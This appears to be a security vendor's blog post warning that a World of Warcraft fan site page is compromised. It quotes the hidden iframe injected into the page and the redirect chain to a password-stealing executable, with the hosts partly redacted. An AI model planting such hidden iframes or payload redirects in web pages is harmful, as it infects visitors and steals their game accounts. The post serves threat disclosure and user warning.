A page in the site dedicated for fans of the World of Warcraft MMORPG seems to be compromised (Warning: malware code still active as of this writing):

• http://wow.gameamp.com/info/showRaces

The said page has hidden iFrames embedded in several parts:

<iframe height=”1″ width=”0″
src=”http://{BLOCKED}1%33%31%37%35/1.htm”></iframe>

The iFrame’s landing page, when deobfuscated, points to

• http://{BLOCKED}175.com/1.htm

The iFrame code eventually results to a download of the following file:

• http://www.{BLOCKED}175.com/88.exe

…which is a password-stealer for online games. Fortunately, Trend Micro already blocks these malicious sites with its Web reputation services.

Online games have long been targeted by malware, mainly due to the thriving virtual economy underlying them. The daily exchange of virtual goods for real money between avid players can indeed spell profit for malware authors, and fan sites are the perfect portal for relaying these password-stealing malware.

Online players should then be on their guard — both inside the game and outside it. Safe looking sites do not guarantee safety, and the malware enemy can strike anywhere… ready for the kill.